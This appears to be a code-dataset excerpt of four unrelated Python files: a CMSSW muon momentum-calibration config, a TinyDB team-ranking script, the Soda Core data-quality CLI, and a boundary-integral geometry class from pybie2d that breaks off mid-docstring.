"Apache-2.0"
] | 1 | 2020-05-27T10:52:33.000Z | 2020-05-27T10:52:33.000Z | MuonAnalysis/MomentumScaleCalibration/test/tree_production/miniAODVBTFMuonsOnlyTreeMC_CRAB_cfg.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 28 | 2019-08-15T15:21:11.000Z | 2021-12-29T14:13:18.000Z | MuonAnalysis/MomentumScaleCalibration/test/tree_production/miniAODVBTFMuonsOnlyTreeMC_CRAB_cfg.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 1 | 2020-08-18T10:29:49.000Z | 2020-08-18T10:29:49.000Z | import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
process = cms.Process("TREE")
# Merge the two option sets: assigning process.options twice silently
# discards the first assignment (wantSummary was being overwritten).
process.options = cms.untracked.PSet(
    wantSummary = cms.untracked.bool(True),
    SkipEvent = cms.untracked.vstring('ProductNotFound')
)
### command-line options
options = VarParsing.VarParsing()
### eta ranges steerable
options.register('etaMax1',
2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta max (muon1)")
options.register('etaMin1',
-2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta min (muon1)")
options.register('etaMax2',
2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta max (muon2)")
options.register('etaMin2',
-2.4,
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.float,
"eta min (muon2)")
# next line is not working with CRAB
#options.parseArguments()
### end of options
# Messages
process.load("FWCore.MessageService.MessageLogger_cfi")
process.MessageLogger.destinations = ['cout', 'cerr']
process.MessageLogger.cerr.FwkReport.reportEvery = 500
from CondCore.DBCommon.CondDBSetup_cfi import *
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
############ DATABASE conditions ###########################
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
########### FILES ####################################
process.source = cms.Source(
"PoolSource",
# fileNames = cms.untracked.vstring('file:test.root')
fileNames = cms.untracked.vstring(
'/store/mc/Phys14DR/DYToMuMu_M-50_Tune4C_13TeV-pythia8/MINIAODSIM/PU40bx25_tsg_castor_PHYS14_25_V1-v2/00000/622CAFBA-BD9A-E411-BE11-002481E14FFC.root'
)
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))
############ Zmumu GoldenSelection sequence ###############################################
# http://cmssw.cvs.cern.ch/cgi-bin/cmssw.cgi/CMSSW/ElectroWeakAnalysis/ZMuMu/python/ZMuMuGolden_cfi.py?revision=1.7&view=markup&sortby=date
###########################################################################################
# RUN2 muon selection
###########################################################################################
process.RunTwoMuons = cms.EDFilter("PATMuonSelector",
src = cms.InputTag("slimmedMuons"),
cut = cms.string(
'pt > 20 & abs(eta)<2.4' +
'&& (isPFMuon && (isGlobalMuon || isTrackerMuon) )'+
'&& (pfIsolationR04().sumChargedHadronPt+max(0.,pfIsolationR04().sumNeutralHadronEt+pfIsolationR04().sumPhotonEt-0.50*pfIsolationR04().sumPUPt))/pt < 0.20'
)
)
# for isolation (tight WP)
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideMuonId#Muon_Isolation
#### FILL TREE #######################
### helper class definition ###
#####################
class SetParameters:
#####################
def __init__(self):
self.parResolFix = cms.vint32()
self.parResolOrder = cms.vint32()
self.parResol = cms.vdouble()
self.parResolStep = cms.untracked.vdouble()
self.parResolMin = cms.untracked.vdouble()
self.parResolMax = cms.untracked.vdouble()
def set(self, fix, order, value, step, min, max):
self.parResolFix.append(fix)
self.parResolOrder.append(order)
self.parResol.append(value)
self.parResolStep.append(step)
self.parResolMin.append(min)
self.parResolMax.append(max)
### end of the definition ###
setter = SetParameters()
#fix, order, value, step, min, max
setter.set( 0 ,0, -0.00113112 , 0.002, -0.1, 0.1 )
setter.set( 0 ,0, 0.000246547 , 0.00002, -0.01, 0.01 )
setter.set( 0 ,0, 0.00545563 , 0.000002, 0., 0.01 )
setter.set( 0 ,0, 0.00501745 , 0.0002, -0.01, 0.02 )
setter.set( 1 ,0, 0.0091978 , 0.00002, 0., 0.01 )
setter.set( 0 ,0, 0.0999428 , 0.0002, 0., 0.2 )
setter.set( 0 ,0, 0.0484629 , 0.0000002, -0.2, 0.5 )
setter.set( 0 ,0, -1.24738 , 0.0002, -2.2, -0.8 )
setter.set( 1 ,0, 0. , 0.00002, 0., 0.01 )
setter.set( 0 ,0, -0.0499885 , 0.0002, -0.2, 0.1 )
setter.set( 0 ,0, 0.252381 , 0.000002, -0.1, 0.5 )
setter.set( 0 ,0, 1.75024 , 0.0002, 0., 3. )
setter.set( 0 ,0, -1.99739 , 0.001, -2.2, -1.6 )
setter.set( 0 ,0, 1.59216 , 0.001, 1., 2.2 )
setter.set( 1 ,0, 0. , 0.0001, 0., 0.01 )
TREEINPUTNAME=""
TREEOUTPUTNAME="zmumuTree.root"
process.looper = cms.Looper(
"MuScleFit",
# Only used when reading events from a root tree
MaxEventsFromRootTree = cms.int32(-1),
# Specify a file if you want to read events from a root tree in a local file.
# In this case the input source should be an empty source with 0 events.
InputRootTreeFileName = cms.string(TREEINPUTNAME),
# Specify the file name where you want to save a root tree with the muon pairs.
# Leave empty if no file should be written.
OutputRootTreeFileName = cms.string(TREEOUTPUTNAME),
# Choose the kind of muons you want to run on
# -------------------------------------------
MuonLabel = cms.InputTag("RunTwoMuons"),
MuonType = cms.int32(11),
# This line allows to switch to PAT muons. Default is false.
# Note that the onia selection works only with onia patTuples.
PATmuons = cms.untracked.bool(True),
# ---------------- #
# Select resonance #
# ---------------- #
# The resonances are to be specified in this order:
# Z0, Y(3S), Y(2S), Y(1S), Psi(2S), J/Psi
# -------------------------------------------------
resfind = cms.vint32(1, 0, 0, 0, 0, 0),
# Likelihood settings
# -------------------
maxLoopNumber = cms.untracked.int32(1),
# Select which fits to do in which loop (0 = do not, 1 = do)
doResolFit = cms.vint32(0),
doScaleFit = cms.vint32(0),
doBackgroundFit = cms.vint32(0),
doCrossSectionFit = cms.vint32(0),
# Use the probability file or not. If not it will perform a simpler selection taking the muon pair with
# invariant mass closer to the pdf value and will crash if some fit is attempted.
UseProbsFile = cms.untracked.bool(False),
# False = use also MC information
speedup = cms.bool(False),
GenParticlesName = cms.untracked.string("prunedGenParticles"),
# Set this to false if you do not want to use simTracks.
# (Note that this is skipped anyway if speedup == True).
compareToSimTracks = cms.bool(False),
# Output settings
# ---------------
OutputFileName = cms.untracked.string("zmumuHisto.root"),
# BiasType=0 means no bias to muon momenta
# ----------------------------------------
BiasType = cms.int32(0),
parBias = cms.vdouble(),
# SmearType=0 means no smearing applied to muon momenta
# -----------------------------------------------------
SmearType = cms.int32(0),
parSmear = cms.vdouble(),
### taken from J/Psi #########################
ResolFitType = cms.int32(0),
parResolFix = setter.parResolFix,
parResolOrder = setter.parResolOrder,
parResol = setter.parResol,
parResolStep = setter.parResolStep,
parResolMin = setter.parResolMin,
parResolMax = setter.parResolMax,
# -------------------- #
# Scale fit parameters #
# -------------------- #
# -----------------------------------------------------------------------------------
ScaleFitType = cms.int32(0),
parScaleOrder = cms.vint32( 0, 0, 0, 0, 0),
parScaleFix = cms.vint32(1, 1, 1, 1, 1),
parScale = cms.vdouble(-7.3019e-05, 0., 0.00147514, 0.000114635, 0.246663),
# Scale fit type=11: Linear in pt, sinusoidal in phi with muon sign -->GOOD results in phi
## modified for mu+/mu -
# -----------------------------------------------------------------------------------
## ScaleFitType = cms.int32(11),
## parScaleOrder = cms.vint32(0, 0, 0, 0, 0, 0, 0, 0),
## parScaleFix = cms.vint32(0, 0, 0, 0, 0, 0, 0, 0),
## parScale = cms.vdouble(1., 0., 0., 1., 0., 0., 1., 0.),
# ---------------------------- #
# Cross section fit parameters #
# ---------------------------- #
# Note that the cross section fit works differently than the others, it
# fits ratios of parameters. Fix and Order should not be used as is, they
# are there mainly for compatibility.
parCrossSectionOrder = cms.vint32(0, 0, 0, 0, 0, 0),
parCrossSectionFix = cms.vint32(0, 0, 0, 0, 0, 0),
parCrossSection = cms.vdouble(1.233, 2.07, 6.33, 13.9, 2.169, 127.2),
# ------------------------- #
# Background fit parameters #
# ------------------------- #
# Window factors for: Z, Upsilons and (J/Psi,Psi2S) regions
LeftWindowBorder = cms.vdouble(70., 8., 1.391495),
RightWindowBorder = cms.vdouble(110., 12., 5.391495),
# The two parameters of BgrFitType=2 are respectively:
# bgr fraction, (negative of) bgr exp. slope, bgr constant
# --------------------------------------------------------
# The function types for resonances in a region must be the same
BgrFitType = cms.vint32(2, 2, 2), # regions
# These empty parameters should be used when there is no background
    parBgr = cms.vdouble(0., 0., 0., 0., 0., 0.,
                         0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.),
parBgrFix = cms.vint32(0, 0, 0, 0, 0, 0,
# The rest of the parameters is used for the resonance regions. They are automatically fixed in the code
# because they are never used to fit the background, but only after the rescaling.
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1),
parBgrOrder = cms.vint32(0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),
# ----------------------- #
# Set Minuit fit strategy
FitStrategy = cms.int32(2),
# Fit accuracy and debug parameters
StartWithSimplex = cms.bool(True),
ComputeMinosErrors = cms.bool(False),
MinimumShapePlots = cms.bool(True),
########## TO BE ENABLED ################################
# Set the cuts on muons to be used in the fit
MinMuonPt = cms.untracked.double(0.),
MaxMuonPt = cms.untracked.double(1000.),
MinMuonEtaFirstRange = cms.untracked.double(options.etaMin1),
MaxMuonEtaFirstRange = cms.untracked.double(options.etaMax1),
MinMuonEtaSecondRange = cms.untracked.double(options.etaMin2),
MaxMuonEtaSecondRange = cms.untracked.double(options.etaMax2),
#ProbabilitiesFileInPath = cms.untracked.string("MuonAnalysis/MomentumScaleCalibration/test/Probs_merge.root"),
#ProbabilitiesFile = cms.untracked.string("Probs_merge.root"),
# Pile-Up related info
PileUpSummaryInfo = cms.untracked.InputTag("addPileupInfo"),
PrimaryVertexCollection = cms.untracked.InputTag("offlineSlimmedPrimaryVertices"),
# The following parameters can be used to filter events
TriggerResultsLabel = cms.untracked.string("TriggerResults"),
TriggerResultsProcess = cms.untracked.string("HLT"),
TriggerPath = cms.untracked.vstring(""),
# Negate the result of the trigger
NegateTrigger = cms.untracked.bool(False),
debug = cms.untracked.int32(0)
)
process.p = cms.Path(
process.RunTwoMuons
)
| 39.633333 | 159 | 0.573844 | 1,370 | 11,890 | 4.964964 | 0.329927 | 0.030579 | 0.031755 | 0.031167 | 0.133637 | 0.107762 | 0.097324 | 0.086886 | 0.06748 | 0.06748 | 0 | 0.068742 | 0.221867 | 11,890 | 299 | 160 | 39.765886 | 0.666451 | 0.323045 | 0 | 0.081081 | 0 | 0.013514 | 0.102478 | 0.056664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013514 | false | 0 | 0.027027 | 0 | 0.047297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e44b99cb7f96080fd92bad0d3293611480c4c4 | 609 | py | Python | showrating.py | thchuan2001/XCPC_Rating | 9e69225a67502a09e798f95d7dcb093b6db91b53 | [
"MIT"
] | null | null | null | showrating.py | thchuan2001/XCPC_Rating | 9e69225a67502a09e798f95d7dcb093b6db91b53 | [
"MIT"
] | null | null | null | showrating.py | thchuan2001/XCPC_Rating | 9e69225a67502a09e798f95d7dcb093b6db91b53 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from tinydb import TinyDB, Query

def takerank(x):
    # Sort key: each team tuple stores its rating in the third slot.
    return int(x[2])
db = TinyDB('data/list.json', indent=4)
teamdata = Query()
now = db.all()
team = []
for i in now:
team.append((
i['chname'],
i['chschool'],
i['rating'],
))
print("| Rank | School | Name | Rating |")
print("| ---- | ---- | ---- | ---- |")
team.sort(key=takerank, reverse=True)
rank = 1
for i in team:
print(f"| {rank} | {i[1]} | {i[0]} | {i[2]} |")
rank += 1
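# Competition-style ranking sketch (an assumption: ties should share a
# rank), in case equal ratings must not get distinct positions:
#   prev_rating, prev_rank = None, 0
#   for i, t in enumerate(team, start=1):
#       if t[2] != prev_rating:
#           prev_rating, prev_rank = t[2], i
#       print(f"| {prev_rank} | {t[1]} | {t[0]} | {t[2]} |")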
| 21.75 | 51 | 0.576355 | 85 | 609 | 4.070588 | 0.564706 | 0.057803 | 0.034682 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014768 | 0.221675 | 609 | 27 | 52 | 22.555556 | 0.71519 | 0 | 0 | 0 | 0 | 0.043478 | 0.218391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.173913 | 0.043478 | 0.26087 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e4a5c8c4a43e4dcbbb464132726c8860f5726f | 9,886 | py | Python | soda/core/soda/cli/cli.py | sodadata/soda-core | d9b98d4f6f3364c5eb8210e8288c4c861bcf8f8a | [
"Apache-2.0"
] | 4 | 2022-03-23T02:43:42.000Z | 2022-03-31T15:20:54.000Z | soda/core/soda/cli/cli.py | sodadata/soda-core | d9b98d4f6f3364c5eb8210e8288c4c861bcf8f8a | [
"Apache-2.0"
] | 543 | 2022-03-22T09:02:17.000Z | 2022-03-31T16:29:41.000Z | soda/core/soda/cli/cli.py | sodadata/soda-core | d9b98d4f6f3364c5eb8210e8288c4c861bcf8f8a | [
"Apache-2.0"
] | 1 | 2022-03-27T03:37:55.000Z | 2022-03-27T03:37:55.000Z | # Copyright 2022 Soda
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
from typing import List, Optional, Tuple
import click
from ruamel.yaml import YAML
from soda.common.file_system import file_system
from soda.common.logs import configure_logging
from soda.common.yaml_helper import to_yaml_str
from soda.scan import Scan
from soda.telemetry.soda_telemetry import SodaTelemetry
from soda.telemetry.soda_tracer import soda_trace, span_setup_function_args
from ..__version__ import SODA_CORE_VERSION
soda_telemetry = SodaTelemetry.get_instance()
@click.group(help=f"Soda Core CLI version {SODA_CORE_VERSION}")
def main():
pass
# NOTE: placed mid-module, this guard runs main() before the scan/update
# commands below are registered; the packaged console entry point is fine,
# but direct execution sees an empty command group at this point.
if __name__ == "__main__":
    main()
@main.command(
short_help="runs a scan",
)
@click.option("-d", "--data-source", envvar="SODA_DATA_SOURCE", required=True, multiple=False, type=click.STRING)
@click.option(
"-s",
"--scan-definition",
envvar="SODA_SCAN_DEFINITION",
required=False,
multiple=False,
type=click.STRING,
default="test",
)
@click.option("-v", "--variable", required=False, default=None, multiple=True, type=click.STRING)
@click.option(
"-c",
"--configuration",
required=False,
multiple=True,
type=click.STRING,
)
@click.option("-V", "--verbose", is_flag=True)
@click.argument("sodacl_paths", nargs=-1, type=click.STRING)
@soda_trace
def scan(
sodacl_paths: List[str],
data_source: str,
scan_definition: Optional[str],
configuration: List[str],
variable: List[str],
verbose: Optional[bool],
):
"""
soda scan will
* Parse the SodaCL files and report any errors
* Build and execute queries for the checks
* Evaluate the checks
* Produce a summary on the console
* If configured, send results to Soda Cloud
option -d --data-source is the name of the data source in the configuration. It's required.
option -c --configuration is the configuration file containing the data source definitions.
If not provided, the default ~/.soda/configuration.yml is used.
    option -v --variable passes a variable to the scan. Variables are optional and multiple variables
    can be specified: -v "today=2020-04-12" -v "yesterday=2020-04-11"
option -s --scan-definition is used By Soda Cloud (only if configured) to correlate subsequent scans and
show check history over time. Scans normally happen as part of a schedule. It's optional. The default
is "test", which is usually sufficient when testing the CLI and Soda Cloud connection.
option -V --verbose activates more verbose logging, including the queries that are executed.
    [SODACL_PATHS] is a list of file paths that can be either a SodaCL file or a directory.
    Directories are scanned recursively and all files ending with .yml are added.
Example:
soda scan -d snowflake_customer_data -v TODAY=2022-03-11 -V ./snfk/pipeline_customer_checks.yml
"""
configure_logging()
fs = file_system()
soda_telemetry.set_attribute("cli_command_name", "scan")
span_setup_function_args(
{
"command_argument": {
"scan_definition": scan_definition,
},
"command_option": {
"sodacl_paths": len(sodacl_paths),
"variables": len(variable),
"configuration_paths": len(configuration),
"offline": False, # TODO: change after offline mode is supported.
"non_interactive": False, # TODO: change after non interactive mode is supported.
"verbose": verbose,
},
}
)
scan = Scan()
if verbose:
scan.set_verbose()
if isinstance(data_source, str):
scan.set_data_source_name(data_source)
if isinstance(scan_definition, str):
scan.set_scan_definition_name(scan_definition)
if configuration:
for configuration_path in configuration:
if not fs.exists(configuration_path):
scan._logs.error(f"Configuration path '{configuration_path}' does not exist")
else:
scan.add_configuration_yaml_files(configuration_path)
else:
default_configuration_file_path = "~/.soda/configuration.yml"
if fs.is_file(default_configuration_file_path):
scan.add_configuration_yaml_file(default_configuration_file_path)
elif not fs.exists(default_configuration_file_path):
scan._logs.warning("No configuration file specified nor found on ~/.soda/configuration.yml")
if sodacl_paths:
for sodacl_path_element in sodacl_paths:
scan.add_sodacl_yaml_files(sodacl_path_element)
else:
scan._logs.warning("No SodaCL files specified")
    if variable:
        # Split on the first '=' only, so variable values may themselves
        # contain '=' (e.g. -v "filter=a=b") without breaking the dict build.
        variables_dict = dict(v.split("=", 1) for v in variable)
        scan.add_variables(variables_dict)
sys.exit(scan.execute())
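
# Programmatic equivalent of `soda scan` (a sketch: it reuses only the Scan
# calls already made above, with hypothetical file names):
#   scan = Scan()
#   scan.set_data_source_name("snowflake_customer_data")
#   scan.add_configuration_yaml_files("~/.soda/configuration.yml")
#   scan.add_sodacl_yaml_files("./checks.yml")
#   exit_code = scan.execute()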
@main.command(
short_help="updates a distribution reference file",
)
@click.option("-d", "--data-source", envvar="SODA_DATA_SOURCE", required=True, multiple=False, type=click.STRING)
@click.option(
"-c",
"--configuration",
required=False,
multiple=False,
type=click.STRING,
)
@click.option("-V", "--verbose", is_flag=True)
@click.argument("distribution_reference_file", type=click.STRING)
def update(
distribution_reference_file: str,
data_source: str,
configuration: str,
verbose: Optional[bool],
):
"""
soda update will
* Read the configuration and instantiate a connection to the data source
* Read the definition properties in the distribution reference file
* Update bins, labels and/or weights under key "reference distribution" in the distribution reference file
option -d --data-source is the name of the data source in the configuration. It's required.
    option -c --configuration is the configuration file containing the data source definitions.
    If not provided, the default ~/.soda/configuration.yml is used.
option -V --verbose activates more verbose logging, including the queries that are executed.
[DISTRIBUTION_REFERENCE_FILE] is a distribution reference file
Example:
soda update -d snowflake_customer_data ./customers_size_distribution_reference.yml
"""
configure_logging()
fs = file_system()
distribution_reference_yaml_str = fs.file_read_as_str(distribution_reference_file)
if not distribution_reference_yaml_str:
logging.error(f"Could not read file {distribution_reference_file}")
return
yaml = YAML()
try:
distribution_dict = yaml.load(distribution_reference_yaml_str)
except BaseException as e:
logging.error(f"Could not parse distribution reference file {distribution_reference_file}: {e}")
return
    dataset_name = distribution_dict.get("dataset")
    if not dataset_name:
        # Fall back to the legacy "table" key; default to None so a file
        # with neither key reaches the error below instead of a KeyError.
        dataset_name = distribution_dict.pop("table", None)
        distribution_dict["dataset"] = dataset_name
    if not dataset_name:
        logging.error(f"Missing key 'dataset' in distribution reference file {distribution_reference_file}")
column_name = distribution_dict.get("column")
if not column_name:
logging.error(f"Missing key 'column' in distribution reference file {distribution_reference_file}")
distribution_type = distribution_dict.get("distribution_type")
if not distribution_type:
logging.error(f"Missing key 'distribution_type' in distribution reference file {distribution_reference_file}")
filter = distribution_dict.get("filter")
filter_clause = ""
if filter is not None:
filter_clause = f"WHERE {filter}"
if dataset_name and column_name and distribution_type:
query = f"SELECT {column_name} FROM {dataset_name} {filter_clause}"
logging.info(f"Querying column values to build distribution reference:\n{query}")
scan = Scan()
scan.add_configuration_yaml_files(configuration)
data_source_scan = scan._get_or_create_data_source_scan(data_source_name=data_source)
if data_source_scan:
rows = __execute_query(data_source_scan.data_source.connection, query)
# TODO document what the supported data types are per data source type. And ensure proper Python data type conversion if needed
column_values = [row[0] for row in rows]
from soda.scientific.distribution.comparison import RefDataCfg
from soda.scientific.distribution.generate_dro import DROGenerator
dro = DROGenerator(RefDataCfg(distribution_type=distribution_type), column_values).generate()
distribution_dict["distribution_reference"] = dro.dict()
if "distribution reference" in distribution_dict:
            # Clean up the file so the old "distribution reference" syntax
            # does not linger next to the new key.
distribution_dict.pop("distribution reference")
new_file_content = to_yaml_str(distribution_dict)
fs.file_write_from_str(path=distribution_reference_file, file_content_str=new_file_content)
def __execute_query(connection, sql: str) -> List[Tuple]:
try:
cursor = connection.cursor()
try:
cursor.execute(sql)
return cursor.fetchall()
finally:
cursor.close()
    except BaseException as e:
        # "exc_info", not "exception", is the logging kwarg that attaches
        # the traceback; the original keyword raised a TypeError itself.
        logging.error(f"Query error: {e}\n{sql}", exc_info=e)
| 35.561151 | 139 | 0.702205 | 1,263 | 9,886 | 5.315914 | 0.235154 | 0.081323 | 0.067024 | 0.014894 | 0.266458 | 0.221478 | 0.176497 | 0.124814 | 0.124814 | 0.124814 | 0 | 0.004362 | 0.211612 | 9,886 | 277 | 140 | 35.689531 | 0.85707 | 0.29213 | 0 | 0.264706 | 0 | 0 | 0.186057 | 0.039024 | 0 | 0 | 0 | 0.00722 | 0 | 1 | 0.023529 | false | 0.005882 | 0.082353 | 0 | 0.123529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e594e0d66dd6e977267db177cc0c24d3f9f1cd | 9,411 | py | Python | pybie2d/boundaries/global_smooth_boundary/global_smooth_boundary.py | dbstein/pybie2d | 1c2d6c05f6dbb4f1ab4476d3824f4dde20f90d58 | [
"Apache-2.0"
] | 11 | 2018-10-26T17:34:29.000Z | 2020-04-27T21:21:33.000Z | pybie2d/boundaries/global_smooth_boundary/global_smooth_boundary.py | dbstein/pybie2d | 1c2d6c05f6dbb4f1ab4476d3824f4dde20f90d58 | [
"Apache-2.0"
] | null | null | null | pybie2d/boundaries/global_smooth_boundary/global_smooth_boundary.py | dbstein/pybie2d | 1c2d6c05f6dbb4f1ab4476d3824f4dde20f90d58 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import scipy as sp
import scipy.signal
import warnings
import os
from ..boundary import Boundary
from .laplace_slp_self_kress import Laplace_SLP_Self_Kress
from .stokes_slp_self_kress import Stokes_SLP_Self_Kress
from .laplace_cslp_self_kress import Laplace_CSLP_Self_Kress
from .laplace_close_quad import Laplace_Close_Quad
from .stokes_close_quad import Stokes_Close_Quad
from .modified_helmholtz_dlp_self import Modified_Helmholtz_DLP_Self
from .modified_helmholtz_slp_self import Modified_Helmholtz_SLP_Self
from .modified_helmholtz_close_quad import Modified_Helmholtz_Close_Quad
from .stokes_slp_self_traction import Stokes_SLP_Self_Traction
def my_resample(f, n):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
return sp.signal.resample(f, n)
class Global_Smooth_Boundary(Boundary):
"""
    This class implements a "global smooth boundary" for use in
    Boundary Integral methods
Instantiation: see documentation to self.__init__()
"""
def __init__(self, x=None, y=None, c=None):
"""
This function initializes the boundary element.
x (optional): real vector of x-coordinates
y (optional): real vector of y-coordinates
c (optional): complex vector with c.real giving x-coordinates
and c.imag giving y-coordinates
The user must provide at least one of the following sets of inputs:
(1) x and y
(x and y positions, as real vectors)
(2) c
            (x and y positions as a complex vector, x=c.real, y=c.imag)
        If inside_point is not provided, it will be computed as the mean
        of the boundary nodes; this may not actually be inside!
        As of now, it's not clear that everything will work if n is odd,
        so an error is thrown if x/y/c have an odd number of elements.
        """
super(Global_Smooth_Boundary, self).__init__(x, y, c)
if self.N % 2 != 0:
            raise Exception(
                'The Global_Smooth_Boundary class only accepts even N.')
self.t, self.dt = np.linspace(0, 2*np.pi, self.N, \
endpoint=False, retstep=True)
self.k = np.fft.fftfreq(self.N, self.dt/(2.0*np.pi)) # fourier modes
self.k[int(self.N/2)] = 0.0 # wipe out nyquist frequency
self.ik = 1j*self.k
self.chat = np.fft.fft(self.c)
self.cp = np.fft.ifft(self.chat*self.ik)
self.cpp = np.fft.ifft(self.chat*self.ik**2)
self.speed = np.abs(self.cp)
self.tangent_c = self.cp/self.speed
self.tangent_x = self.tangent_c.real
self.tangent_y = self.tangent_c.imag
self.normal_c = -1.0j*self.tangent_c
self.normal_x = self.normal_c.real
self.normal_y = self.normal_c.imag
self.curvature = -(np.conj(self.cpp)*self.normal_c).real/self.speed**2
self.weights = self.dt*self.speed
self.complex_weights = self.dt*self.cp
self.scaled_cp = self.cp/self.N
self.scaled_speed = self.speed/self.N
self.max_h = np.max(self.weights)
self.area = self.dt*np.sum(self.x*self.cp.imag)
self.perimeter = self.dt*np.sum(self.speed)
self.defined_modules = [ 'Laplace_SLP_Self_Kress',
'Stokes_SLP_Self_Kress',
'Laplace_CSLP_Self_Kress',
'Laplace_Close_Quad',
'Stokes_Close_Quad',
'Modified_Helmholtz_DLP_Self',
'Modified_Helmholtz_SLP_Self',
'Modified_Helmholtz_Close_Quad',
'Stokes_SLP_Self_Traction',
]
# end __init__ function definition
def add_module(self, name):
"""
Add a module to boundary to obtain specific functionality
"""
if not name in self.defined_modules:
msg = "Module '" + name + "' is not a known module for Global_Smooth_Boundary class."
raise Exception(msg)
if not hasattr(self, name):
setattr(self, name, eval(name + '(self)'))
# end add_module function definition
def set_inside_point(self, c):
"""
Set an inside point, used in close evaluation schemes
If self-eval schemes are called before this is set, this will be
computed as the average of the boundary nodes, which may not be inside
        c should be a complex float, with c.real=x, c.imag=y
"""
good = self._test_inside_point(c)
if not good:
warnings.warn('Inside point failed basic test, is it actually inside?')
self.inside_point_c = c
# end set_inside_point function definition
def get_inside_point(self):
if not hasattr(self, 'inside_point_c'):
candidate = np.sum(self.c)/self.N
good = self._test_inside_point(candidate)
if not good:
warnings.warn('Inside point computed as mean, failed basic test, is it actually inside?')
self.inside_point_c = candidate
return self.inside_point_c
# end get_inside_point function definition
def generate_resampled_boundary(self, new_N):
sfc = my_resample(self.c, new_N)
# sfc = sp.signal.resample(self.c, new_N)
return Global_Smooth_Boundary(c=sfc)
# end generate_resampled_boundary definition
#########################
#### Public Methods #####
#########################
    ##### These provide interfaces so that high level functions
    ##### can easily extract the functions that they need
# self quadrature (apply) for Laplace SLP
def Laplace_SLP_Self_Apply(self, *args, **kwargs):
self.add_module('Laplace_SLP_Self_Kress')
return self.Laplace_SLP_Self_Kress.Apply(*args, **kwargs)
# self quadrature (form) for Laplace SLP
def Laplace_SLP_Self_Form(self, *args, **kwargs):
self.add_module('Laplace_SLP_Self_Kress')
return self.Laplace_SLP_Self_Kress.Form(*args, **kwargs)
# self quadrature (apply) for Stokes SLP
def Stokes_SLP_Self_Apply(self, *args, **kwargs):
self.add_module('Stokes_SLP_Self_Kress')
return self.Stokes_SLP_Self_Kress.Apply(*args, **kwargs)
# self quadrature (form) for Stokes SLP
def Stokes_SLP_Self_Form(self, *args, **kwargs):
self.add_module('Stokes_SLP_Self_Kress')
return self.Stokes_SLP_Self_Kress.Form(*args, **kwargs)
# self quadrature (form) for Modified Helmholtz DLP
def Modified_Helmholtz_DLP_Self_Form(self, *args, **kwargs):
self.add_module('Modified_Helmholtz_DLP_Self')
return self.Modified_Helmholtz_DLP_Self.Form(*args, **kwargs)
# self quadrature (form) for Modified Helmholtz SLP
def Modified_Helmholtz_SLP_Self_Form(self, *args, **kwargs):
self.add_module('Modified_Helmholtz_SLP_Self')
return self.Modified_Helmholtz_SLP_Self.Form(*args, **kwargs)
# generate Minimum Global Smooth Boundary based on first point
# this is very useful for Circulant problems
def Generate_1pt_Circulant_Boundary(self):
return Minimal_Global_Smooth_Boundary(self.c[0], self.normal_c[0],
self.weights[0], self.curvature[0])
###### Method for generating close corrections
def tolerance_to_distance(self, tol):
"""
Given error tolerance, finds distance where close evaluation is needed
"""
return -np.log(tol)*self.max_h/4.5
def Get_Close_Corrector(self, kernel, *args, **kwargs):
if kernel == 'laplace':
self.add_module('Laplace_Close_Quad')
return self.Laplace_Close_Quad.Get_Close_Corrector(*args, **kwargs)
elif kernel == 'stokes':
self.add_module('Stokes_Close_Quad')
return self.Stokes_Close_Quad.Get_Close_Corrector(*args, **kwargs)
elif kernel == 'modified_helmholtz':
self.add_module('Modified_Helmholtz_Close_Quad')
return self.Modified_Helmholtz_Close_Quad.Get_Close_Corrector(*args, **kwargs)
else:
raise Exception("Specified kernel: '" + kernel + "' not recognized.")
#########################
#### Private Methods ####
#########################
def _test_inside_point(self, candidate, eps=1e-10):
"""
Test whether the provided or generated inside point is acceptable
